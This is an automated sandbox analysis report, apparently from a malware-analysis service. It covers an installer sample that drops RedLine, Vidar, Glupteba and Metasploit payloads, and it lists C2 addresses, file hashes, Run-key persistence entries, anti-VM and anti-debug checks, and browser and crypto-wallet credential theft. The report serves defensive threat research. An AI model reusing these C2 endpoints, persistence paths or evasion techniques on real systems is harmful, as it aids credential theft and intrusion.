Overview
Resubmissions

Score | Date | ID
10 | 11-03-2024 21:22 | 240311-z8dsssgg58
10 | 01-09-2021 13:18 | 210901-5bmxjspa5s
10 | 01-09-2021 13:04 | 210901-te4btfspqa
10 | 01-09-2021 05:12 | 210901-4wnkwm1p3j
10 | 31-08-2021 21:47 | 210831-41rp97dma2
10 | 31-08-2021 19:51 | 210831-359awwatje
10 | 29-08-2021 11:37 | 210829-18htk4slyj
10 | 28-08-2021 23:10 | 210828-rt8b9gzxn6
10 | 28-08-2021 22:59 | 210828-zxgnh5j4w6
10 | 28-08-2021 11:31 | 210828-xrjs66aknj

Analysis

Score: 10
Max time kernel: 1496s
Max time network: 1797s
Platform: windows10_x64
Resource: win10v20210410
Submitted: 24-08-2021 08:18
Static task: static1

Behavioral tasks:

Task | Sample | Resource
behavioral1 | Setup (1).exe | win7v20210408
behavioral2 | Setup (1).exe | win10v20210408
behavioral3 | Setup (10).exe | win7v20210410
behavioral4 | Setup (10).exe | win10v20210408
behavioral5 | Setup (11).exe | win7v20210410
behavioral6 | Setup (11).exe | win10v20210410
behavioral7 | Setup (12).exe | win7v20210408
behavioral8 | Setup (12).exe | win10v20210410
behavioral9 | Setup (13).exe | win7v20210408
behavioral10 | Setup (13).exe | win10v20210410
behavioral11 | Setup (14).exe | win7v20210408
behavioral12 | Setup (14).exe | win10v20210410
behavioral13 | Setup (15).exe | win7v20210410
behavioral14 | Setup (15).exe | win10v20210408
behavioral15 | Setup (16).exe | win7v20210410
behavioral16 | Setup (16).exe | win10v20210408
behavioral17 | Setup (17).exe | win7v20210410
behavioral18 | Setup (17).exe | win10v20210408
behavioral19 | Setup (18).exe | win7v20210410
behavioral20 | Setup (18).exe | win10v20210410
behavioral21 | Setup (19).exe | win7v20210408
behavioral22 | Setup (19).exe | win10v20210410
behavioral23 | Setup (2).exe | win7v20210408
behavioral24 | Setup (2).exe | win10v20210410
behavioral25 | Setup (20).exe | win7v20210408
behavioral26 | Setup (20).exe | win10v20210410
behavioral27 | Setup (21).exe | win7v20210410
behavioral28 | Setup (21).exe | win10v20210408
behavioral29 | Setup (22).exe | win7v20210410
behavioral30 | Setup (22).exe | win10v20210408
behavioral31 | Setup (23).exe | win7v20210410
General

Target: Setup (13).exe
Size: 631KB
MD5: cb927513ff8ebff4dd52a47f7e42f934
SHA1: 0de47c02a8adc4940a6c18621b4e4a619641d029
SHA256: fd5c970806fba1500cbb6af5328329aeb43b8de3f02d90ec5d8cd1d57711622f
SHA512: 988c8fd886a9155b7d190faf2ce6b34d910efcffcf1c6251f18a9d0c804a0ea26a89679273033ac98b200363c536426efd1ae9de445c34e660369abb06f0071c
Malware Config

Extracted family: redline
Botnet: 24.08
C2: 95.181.172.100:55640

Extracted family: vidar
Version: 40.1
Botnet: 937
C2: https://eduarroma.tumblr.com/
profile_id: 937

Extracted family: redline
Botnet: dibild2
C2: 135.148.139.222:1494

Extracted family: metasploit
Payload: windows/single_exec
Signatures

Glupteba Payload (2 IoCs)
Processes:

resource | yara_rule
behavioral10/memory/2240-335-0x0000000005230000-0x0000000005B56000-memory.dmp | family_glupteba
behavioral10/memory/2240-349-0x0000000000400000-0x00000000030E7000-memory.dmp | family_glupteba
MetaSploit
Detected malicious payload which is part of the Metasploit Framework, likely generated with msfvenom or similar.

NetSupport
NetSupport is a remote access tool sold as a legitimate system administration software.

Process spawned unexpected child process (14 IoCs)
This typically indicates the parent process was compromised via an exploit or macro.
Processes:

description | pid | pid_target | process
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process | 4480 | 2364 | schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process | 3352 | 2364 | schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process | 5096 | 2364 | schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process | 5240 | 2364 | schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process | 1536 | 2364 | rundll32.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process | 6308 | 2364 | schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process | 4504 | 2364 | rundll32.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process | 6008 | 2364 | schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process | 6668 | 2364 | rundll32.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process | 7940 | 2364 | schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process | 5060 | 2364 | rundll32.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process | 192 | 2364 | schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process | 5484 | 2364 | schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process | 2756 | 2364 | schtasks.exe
RedLine
RedLine Stealer is a malware family written in C#, first appearing in early 2020.

RedLine Payload (10 IoCs)
Processes:

resource | yara_rule
C:\Users\Admin\Documents\Mh9JAL13r0v0BmNX5FgEGHKj.exe | family_redline
C:\Users\Admin\Documents\CW9iZUPnTLWFDj2aH5MN_4dK.exe | family_redline
C:\Users\Admin\Documents\Mh9JAL13r0v0BmNX5FgEGHKj.exe | family_redline
behavioral10/memory/4532-257-0x000000000041A616-mapping.dmp | family_redline
behavioral10/memory/4532-285-0x00000000050B0000-0x00000000056B6000-memory.dmp | family_redline
behavioral10/memory/4812-287-0x000000000041A76A-mapping.dmp | family_redline
behavioral10/memory/4812-283-0x0000000000400000-0x0000000000420000-memory.dmp | family_redline
behavioral10/memory/4812-303-0x0000000005770000-0x0000000005C6E000-memory.dmp | family_redline
behavioral10/memory/4532-253-0x0000000000400000-0x0000000000420000-memory.dmp | family_redline
C:\Users\Admin\Documents\CW9iZUPnTLWFDj2aH5MN_4dK.exe | family_redline
Suspicious use of NtCreateProcessExOtherParentProcess (5 IoCs)
Processes:

description | pid | process | target process
PID 1732 created 2804 | 1732 | WerFault.exe | 4b5m9Xjbeh4Y9rTVY8V4famT.exe
PID 6040 created 1392 | 6040 | WerFault.exe | ySzhlkxv6lvVdaZGAMZc3MjG.exe
PID 7452 created 7016 | 7452 | Esplorarne.exe.com | uQ1sY0V9BPG6y1BJhAoaX8hC.exe
PID 2100 created 7096 | 2100 | WerFault.exe | Vlaiw1QOxP2xyB7onsxPGq4k.exe
PID 8056 created 5072 | 8056 | WerFault.exe | MicrosoftEdgeCP.exe
Suspicious use of NtCreateUserProcessOtherParentProcess (2 IoCs)
Processes:

description | pid | process | target process
PID 8028 created 2240 | 8028 | svchost.exe | 9NeY7wDiJGhrvsW_GspXT3lp.exe
PID 8028 created 6844 | 8028 | svchost.exe | Esplorarne.exe.com
Checks for common network interception software (1 TTPs)
Looks in the registry for tools like Wireshark or Fiddler commonly used to analyze network activity.

Identifies VirtualBox via ACPI registry values (likely anti-VM) (2 TTPs)

Vidar Stealer (2 IoCs)
Processes:

resource | yara_rule
behavioral10/memory/2100-294-0x00000000040A0000-0x000000000413D000-memory.dmp | family_vidar
behavioral10/memory/2100-307-0x0000000000400000-0x0000000002402000-memory.dmp | family_vidar
Blocklisted process makes network request (64 IoCs)
Creates new service(s) (1 TTPs)

Downloads MZ/PE file
Drops file in Drivers directory (4 IoCs)
Processes:

description | ioc | process
File opened for modification | C:\Windows\system32\drivers\etc\hosts | ultradumnibour.exe
File opened for modification | C:\Windows\System32\drivers\SET8EEA.tmp | DrvInst.exe
File created | C:\Windows\System32\drivers\SET8EEA.tmp | DrvInst.exe
File opened for modification | C:\Windows\System32\drivers\tap0901.sys | DrvInst.exe
Executes dropped EXE (64 IoCs)
Modifies Windows Firewall (1 TTPs)
Checks BIOS information in registry (2 TTPs, 18 IoCs)
BIOS information is often read in order to detect sandboxing environments.
Processes:

description | ioc | process
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion | VQF2oO7acvvovPhrwKWLMcyD.exe
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion | CW9iZUPnTLWFDj2aH5MN_4dK.exe
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion | GcpFYsjX4UKHyKnErFNxlep5.exe
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion | GcpFYsjX4UKHyKnErFNxlep5.exe
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion | FBFC.exe
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion | FBFC.exe
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion | Mh9JAL13r0v0BmNX5FgEGHKj.exe
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion | VQF2oO7acvvovPhrwKWLMcyD.exe
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion | CW9iZUPnTLWFDj2aH5MN_4dK.exe
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion | ZZ6GYPrzOB779rzI1ngINoXX.exe
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion | zY9vzMCWwAKcME9k5UgICs9t.exe
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion | Mh9JAL13r0v0BmNX5FgEGHKj.exe
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion | ZZ6GYPrzOB779rzI1ngINoXX.exe
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion | Dy1p0_A7yf7E__PB5TFDm6I9.exe
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion | zY9vzMCWwAKcME9k5UgICs9t.exe
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion | 5whapuEleHrHkM3YY_zHWiK8.exe
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion | Dy1p0_A7yf7E__PB5TFDm6I9.exe
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion | 5whapuEleHrHkM3YY_zHWiK8.exe
Checks computer location settings (2 TTPs, 9 IoCs)
Looks up country code configured in the registry, likely geofence.
Processes:

description | ioc | process
Key value queried | \REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000\Control Panel\International\Geo\Nation | Esplorarne.exe.com
Key value queried | \REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000\Control Panel\International\Geo\Nation | Setup (13).exe
Key value queried | \REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000\Control Panel\International\Geo\Nation | xtect12.exe
Key value queried | \REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000\Control Panel\International\Geo\Nation | SHilapajigae.exe
Key value queried | \REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000\Control Panel\International\Geo\Nation | Esplorarne.exe.com
Key value queried | \REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000\Control Panel\International\Geo\Nation | Esplorarne.exe.com
Key value queried | \REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000\Control Panel\International\Geo\Nation | Esplorarne.exe.com
Key value queried | \REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000\Control Panel\International\Geo\Nation | Esplorarne.exe.com
Key value queried | \REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000\Control Panel\International\Geo\Nation | Esplorarne.exe.com
Drops startup file (3 IoCs)
Processes:

description | ioc | process
File created | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\fastsystem2021.exe | customer3.exe
File opened for modification | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\fastsystem2021.exe | customer3.exe
File created | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\iZpAWbaURv.url | Esplorarne.exe.com
Loads dropped DLL (64 IoCs)
Reads user/profile data of web browsers (2 TTPs)
Infostealers often target stored browser data, which can include saved credentials etc.

Processes:

resource | yara_rule
C:\Users\Admin\Documents\Mh9JAL13r0v0BmNX5FgEGHKj.exe | themida
C:\Users\Admin\Documents\GcpFYsjX4UKHyKnErFNxlep5.exe | themida
C:\Users\Admin\Documents\CW9iZUPnTLWFDj2aH5MN_4dK.exe | themida
C:\Users\Admin\Documents\VQF2oO7acvvovPhrwKWLMcyD.exe | themida
C:\Users\Admin\Documents\Mh9JAL13r0v0BmNX5FgEGHKj.exe | themida
behavioral10/memory/2660-245-0x00000000011E0000-0x00000000011E1000-memory.dmp | themida
behavioral10/memory/2696-241-0x0000000000C00000-0x0000000000C01000-memory.dmp | themida
behavioral10/memory/2772-240-0x0000000000FC0000-0x0000000000FC1000-memory.dmp | themida
behavioral10/memory/2172-230-0x0000000000D30000-0x0000000000D31000-memory.dmp | themida
C:\Users\Admin\Documents\CW9iZUPnTLWFDj2aH5MN_4dK.exe | themida
C:\Users\Admin\Documents\VQF2oO7acvvovPhrwKWLMcyD.exe | themida
C:\Users\Admin\Documents\GcpFYsjX4UKHyKnErFNxlep5.exe | themida
Accesses cryptocurrency files/wallets, possible credential harvesting (2 TTPs)
Adds Run key to start application (2 TTPs, 13 IoCs)
Processes:

description | ioc | process
Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\tuuN5KFkdh6HTJMT2aKyIIjj = "\"C:\\Boot\\pt-BR\\tuuN5KFkdh6HTJMT2aKyIIjj.exe\"" | Esplorarne.exe.com
Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\fontdrvhost = "\"C:\\Program Files\\Windows Sidebar\\Gadgets\\fontdrvhost.exe\"" | Esplorarne.exe.com
Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\4b5m9Xjbeh4Y9rTVY8V4famT = "\"C:\\Windows\\GameBarPresenceWriter\\4b5m9Xjbeh4Y9rTVY8V4famT.exe\"" | WerFault.exe
Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\dllhost = "\"C:\\Windows\\System32\\negoexts\\dllhost.exe\"" | WerFault.exe
Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\VQF2oO7acvvovPhrwKWLMcyD = "\"C:\\Users\\Admin\\Documents\\ySzhlkxv6lvVdaZGAMZc3MjG\\VQF2oO7acvvovPhrwKWLMcyD.exe\"" | Esplorarne.exe.com
Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Idle = "\"C:\\odt\\Idle.exe\"" | Esplorarne.exe.com
Set value (str) | \REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000\Software\Microsoft\Windows\CurrentVersion\Run\WinHost = "C:\\Users\\Admin\\AppData\\Roaming\\WinHost\\WinHoster.exe" | 5398377.exe
Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce\system recover = "\"C:\\Program Files (x86)\\Google\\Gafyjagufo.exe\"" | ultradumnibour.exe
Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\iHIn3Sm9ab4PCPMlOJLksIeI = "\"C:\\Recovery\\WindowsRE\\iHIn3Sm9ab4PCPMlOJLksIeI.exe\"" | WerFault.exe
Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\dllhost = "\"C:\\odt\\dllhost.exe\"" | WerFault.exe
Set value (str) | \REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000\Software\Microsoft\Windows\CurrentVersion\Run\uvximcnr = "\"C:\\Users\\Admin\\iajrobnh.exe\"" | 7F4.exe
Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\lsass = "\"C:\\Windows\\System32\\DscTimer\\lsass.exe\"" | WerFault.exe
Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\3bddbg9jWr7Ig8wwsIl8rRbl = "\"C:\\Program Files\\Windows Security\\3bddbg9jWr7Ig8wwsIl8rRbl.exe\"" | WerFault.exe
Checks installed software on the system (1 TTPs)
Looks up Uninstall key entries in the registry to enumerate software on the system.

Processes:

description | ioc | process
Key value queried | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA | CW9iZUPnTLWFDj2aH5MN_4dK.exe
Key value queried | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA | zY9vzMCWwAKcME9k5UgICs9t.exe
Key value queried | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA | 5whapuEleHrHkM3YY_zHWiK8.exe
Key value queried | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA | VQF2oO7acvvovPhrwKWLMcyD.exe
Key value queried | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA | GcpFYsjX4UKHyKnErFNxlep5.exe
Key value queried | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA | ZZ6GYPrzOB779rzI1ngINoXX.exe
Key value queried | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA | Dy1p0_A7yf7E__PB5TFDm6I9.exe
Key value queried | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA | md8_8eus.exe
Key value queried | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA | Esplorarne.exe.com
Key value queried | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA | Esplorarne.exe.com
Key value queried | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA | Esplorarne.exe.com
Key value queried | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA | Mh9JAL13r0v0BmNX5FgEGHKj.exe
Key value queried | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA | FBFC.exe
Key value queried | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA | Esplorarne.exe.com
Key value queried | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA | Esplorarne.exe.com
Key value queried | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA | Esplorarne.exe.com
Enumerates connected drives (3 TTPs, 64 IoCs)
Attempts to read the root path of hard drives other than the default C: drive.
Legitimate hosting services abused for malware hosting/C2 (1 TTPs)
Looks up external IP address via web service (13 IoCs)
Uses a legitimate IP lookup service to find the infected system's external IP.
Processes:

flow | ioc
213 | ipinfo.io
215 | ipinfo.io
232 | ipinfo.io
362 | ipinfo.io
28 | ipinfo.io
29 | ipinfo.io
139 | ip-api.com
174 | ipinfo.io
367 | ipinfo.io
172 | ipinfo.io
222 | ipinfo.io
242 | ipinfo.io
393 | ip-api.com
Drops file in System32 directory (32 IoCs)
Suspicious use of NtSetInformationThreadHideFromDebugger 64 IoCs
Processes: Mh9JAL13r0v0BmNX5FgEGHKj.exe, GcpFYsjX4UKHyKnErFNxlep5.exe, VQF2oO7acvvovPhrwKWLMcyD.exe, CW9iZUPnTLWFDj2aH5MN_4dK.exe, builder.exe, ZZ6GYPrzOB779rzI1ngINoXX.exe, Dy1p0_A7yf7E__PB5TFDm6I9.exe, zY9vzMCWwAKcME9k5UgICs9t.exe, 5whapuEleHrHkM3YY_zHWiK8.exe, mask_svc.exe, FBFC.exe, mask_svc.exe, mask_svc.exe
pid | process
2172 | Mh9JAL13r0v0BmNX5FgEGHKj.exe
2660 | GcpFYsjX4UKHyKnErFNxlep5.exe
2696 | VQF2oO7acvvovPhrwKWLMcyD.exe
2772 | CW9iZUPnTLWFDj2aH5MN_4dK.exe
5928 | builder.exe
5928 | builder.exe
5928 | builder.exe
7104 | ZZ6GYPrzOB779rzI1ngINoXX.exe
5928 | builder.exe
6436 | Dy1p0_A7yf7E__PB5TFDm6I9.exe
6924 | zY9vzMCWwAKcME9k5UgICs9t.exe
5928 | builder.exe
5928 | builder.exe
5928 | builder.exe
5928 | builder.exe
4004 | 5whapuEleHrHkM3YY_zHWiK8.exe
5928 | builder.exe
5928 | builder.exe
5928 | builder.exe
5928 | builder.exe
5928 | builder.exe
5928 | builder.exe
5928 | builder.exe
5928 | builder.exe
5928 | builder.exe
5928 | builder.exe
5928 | builder.exe
7804 | mask_svc.exe
5928 | builder.exe
1888 | FBFC.exe
5928 | builder.exe
4432 | mask_svc.exe
5928 | builder.exe
2792 | mask_svc.exe
5928 | builder.exe
5928 | builder.exe
5928 | builder.exe
5928 | builder.exe
5928 | builder.exe
5928 | builder.exe
5928 | builder.exe
5928 | builder.exe
5928 | builder.exe
5928 | builder.exe
5928 | builder.exe
5928 | builder.exe
5928 | builder.exe
5928 | builder.exe
5928 | builder.exe
5928 | builder.exe
5928 | builder.exe
5928 | builder.exe
5928 | builder.exe
5928 | builder.exe
5928 | builder.exe
5928 | builder.exe
5928 | builder.exe
5928 | builder.exe
5928 | builder.exe
5928 | builder.exe
5928 | builder.exe
5928 | builder.exe
5928 | builder.exe
5928 | builder.exe
-
Suspicious use of SetThreadContext 12 IoCs
Processes: sr1e6evbYvPSPR1h8l_TGwVu.exe, j_16kKcB4jVgGPLP0gdjWZI_.exe, lscm9tUiznW_ZuLtt7SqvXzl.exe, svchost.exe, xSrL1QRuFcmsVaGKJ6KvkP1I.exe, Zpv9oGuLq0irt1z3Dy09GNLE.exe, schtasks.exe, RuntimeBroker.exe, Esplorarne.exe.com, Y3dp0DoOXQwgkUcZkMM1oR1J.exe, RUNDLL32.EXE, Esplorarne.exe.com
description | pid | process | target process
PID 3220 set thread context of 4532 | 3220 | sr1e6evbYvPSPR1h8l_TGwVu.exe | sr1e6evbYvPSPR1h8l_TGwVu.exe
PID 1912 set thread context of 4812 | 1912 | j_16kKcB4jVgGPLP0gdjWZI_.exe | j_16kKcB4jVgGPLP0gdjWZI_.exe
PID 1412 set thread context of 1044 | 1412 | lscm9tUiznW_ZuLtt7SqvXzl.exe | lscm9tUiznW_ZuLtt7SqvXzl.exe
PID 2536 set thread context of 4948 | 2536 | svchost.exe | svchost.exe
PID 3736 set thread context of 4428 | 3736 | xSrL1QRuFcmsVaGKJ6KvkP1I.exe | xSrL1QRuFcmsVaGKJ6KvkP1I.exe
PID 6696 set thread context of 5652 | 6696 | Zpv9oGuLq0irt1z3Dy09GNLE.exe | Zpv9oGuLq0irt1z3Dy09GNLE.exe
PID 6008 set thread context of 6504 | 6008 | schtasks.exe | 1TsU7XyCbc6_GIz5E0qEjgjc.exe
PID 4680 set thread context of 7808 | 4680 | RuntimeBroker.exe | RuntimeBroker.exe
PID 6956 set thread context of 6792 | 6956 | Esplorarne.exe.com | 0cec99sYPHC4JtcYL6Dyhoy2.exe
PID 6512 set thread context of 2732 | 6512 | Y3dp0DoOXQwgkUcZkMM1oR1J.exe | Y3dp0DoOXQwgkUcZkMM1oR1J.exe
PID 8712 set thread context of 9172 | 8712 | RUNDLL32.EXE | rundll32.exe
PID 7576 set thread context of 9024 | 7576 | Esplorarne.exe.com | 3187.exe
-
Drops file in Program Files directory 64 IoCs
Processes: Setup.exe, Esplorarne.exe.com, Setup.tmp, WerFault.exe, Esplorarne.exe.com, md8_8eus.exe, ultramediaburner.tmp, rRzYjitRkR6jBplorkkpKLg9.exe, zGFs3qgZ52GcHMqEBczEQ9x9.exe, rundll32.exe, MaskVPNUpdate.exe, ultradumnibour.exe
description | ioc | process
File opened for modification | C:\Program Files (x86)\GameBox INC\GameBox\WEATHER Manager.exe | Setup.exe
File created | C:\Program Files (x86)\Sofware IN LLC\is-FARTL.tmp | Esplorarne.exe.com
File created | C:\Program Files (x86)\MaskVPN\is-KCKLP.tmp | Setup.tmp
File created | C:\Program Files (x86)\MaskVPN\is-7K48T.tmp | Setup.tmp
File created | C:\Program Files (x86)\MaskVPN\driver\win764\is-0VH5D.tmp | Setup.tmp
File created | C:\Program Files\WindowsApps\Microsoft.NET.Native.Runtime.1.4_1.4.24201.0_x64__8wekyb3d8bbwe\AppxMetadata\taskhostw.exe | WerFault.exe
File opened for modification | C:\Program Files (x86)\MaskVPN\libCommon.dll | Setup.tmp
File created | C:\Program Files (x86)\MaskVPN\driver\win732\is-II15C.tmp | Setup.tmp
File created | C:\Program Files\Windows Sidebar\Gadgets\fontdrvhost.exe | Esplorarne.exe.com
File opened for modification | C:\Program Files (x86)\Company\NewProduct\d.jfm | md8_8eus.exe
File opened for modification | C:\Program Files (x86)\MaskVPN\MaskVPN.exe | Setup.tmp
File opened for modification | C:\Program Files (x86)\MaskVPN\driver\winxp32\devcon.exe | Setup.tmp
File created | C:\Program Files (x86)\UltraMediaBurner\is-C83IR.tmp | ultramediaburner.tmp
File created | C:\Program Files (x86)\MaskVPN\driver\winxp32\is-2FGVE.tmp | Setup.tmp
File opened for modification | C:\Program Files (x86)\GameBox INC\GameBox\LivelyScreenRecS1.9.exe | Setup.exe
File opened for modification | C:\Program Files (x86)\GameBox INC\GameBox\PBrowFile15.exe | Setup.exe
File opened for modification | C:\Program Files (x86)\GameBox INC\GameBox\RuntimeBroker.exe | Setup.exe
File created | C:\Program Files (x86)\Sofware IN LLC\is-DHO0J.tmp | Esplorarne.exe.com
File created | C:\Program Files (x86)\UltraMediaBurner\is-936O7.tmp | ultramediaburner.tmp
File created | C:\Program Files (x86)\MaskVPN\driver\win732\is-PE2PM.tmp | Setup.tmp
File created | C:\Program Files (x86)\MaskVPN\unins000.msg | Setup.tmp
File opened for modification | C:\Program Files (x86)\GameBox INC\GameBox\Stats.exe | Setup.exe
File opened for modification | C:\Program Files (x86)\Company\NewProduct\customer3.exe | rRzYjitRkR6jBplorkkpKLg9.exe
File opened for modification | C:\Program Files (x86)\Sofware IN LLC\libcueify.dll | Esplorarne.exe.com
File created | C:\Program Files (x86)\Sofware IN LLC\is-CI377.tmp | Esplorarne.exe.com
File created | C:\Program Files (x86)\MaskVPN\is-O6PC5.tmp | Setup.tmp
File created | C:\Program Files (x86)\MaskVPN\is-G1GF2.tmp | Setup.tmp
File created | C:\Program Files (x86)\MaskVPN\driver\winxp64\is-H60U3.tmp | Setup.tmp
File opened for modification | C:\Program Files (x86)\Company\NewProduct\md8_8eus.exe | zGFs3qgZ52GcHMqEBczEQ9x9.exe
File created | C:\Program Files (x86)\Company\NewProduct\d | md8_8eus.exe
File created | C:\Program Files (x86)\MaskVPN\driver\winxp32\is-2EIKA.tmp | Setup.tmp
File opened for modification | C:\Program Files (x86)\GameBox INC\GameBox\Cleaner Installation.exe | Setup.exe
File opened for modification | C:\Program Files (x86)\Sofware IN LLC\QtProfiler.exe | Esplorarne.exe.com
File opened for modification | C:\Program Files (x86)\MaskVPN\libeay32.dll | Setup.tmp
File created | C:\Program Files (x86)\MaskVPN\is-DSAO0.tmp | Setup.tmp
File created | C:\Program Files (x86)\MaskVPN\driver\winxp32\is-JU5KG.tmp | Setup.tmp
File opened for modification | C:\Program Files (x86)\GameBox INC\GameBox\xtect12.exe | Setup.exe
File opened for modification | C:\Program Files (x86)\Company\NewProduct\md8_8eus.exe | rRzYjitRkR6jBplorkkpKLg9.exe
File opened for modification | C:\Program Files (x86)\MaskVPN\driver\win732\tapinstall.exe | Setup.tmp
File created | C:\PROGRA~3\Gskyj.tmp | rundll32.exe
File created | C:\Program Files (x86)\Company\NewProduct\d.jfm | md8_8eus.exe
File created | C:\Program Files (x86)\Sofware IN LLC\unins000.dat | Esplorarne.exe.com
File created | C:\Program Files (x86)\MaskVPN\is-PKDNE.tmp | Setup.tmp
File created | C:\Program Files (x86)\MaskVPN\is-6DC4G.tmp | Setup.tmp
File created | C:\Program Files (x86)\MaskVPN\is-KIP09.tmp | Setup.tmp
File created | C:\Program Files (x86)\MaskVPN\is-HFTOE.tmp | Setup.tmp
File created | C:\Program Files (x86)\MaskVPN\driver\win732\is-E8EIU.tmp | Setup.tmp
File opened for modification | C:\Program Files (x86)\MaskVPN\version | MaskVPNUpdate.exe
File created | C:\Program Files (x86)\Sofware IN LLC\is-RIG0D.tmp | Esplorarne.exe.com
File created | C:\Program Files (x86)\MaskVPN\is-GDQ4E.tmp | Setup.tmp
File opened for modification | C:\Program Files (x86)\UltraMediaBurner\UltraMediaBurner.exe | ultramediaburner.tmp
File created | C:\Program Files (x86)\MaskVPN\driver\win732\is-0VR4P.tmp | Setup.tmp
File created | C:\Program Files (x86)\MaskVPN\driver\win764\is-Q57VG.tmp | Setup.tmp
File opened for modification | C:\Program Files (x86)\GameBox INC\GameBox\zhaoy-game.exe | Setup.exe
File opened for modification | C:\Program Files (x86)\GameBox INC\GameBox\VPN.exe | Setup.exe
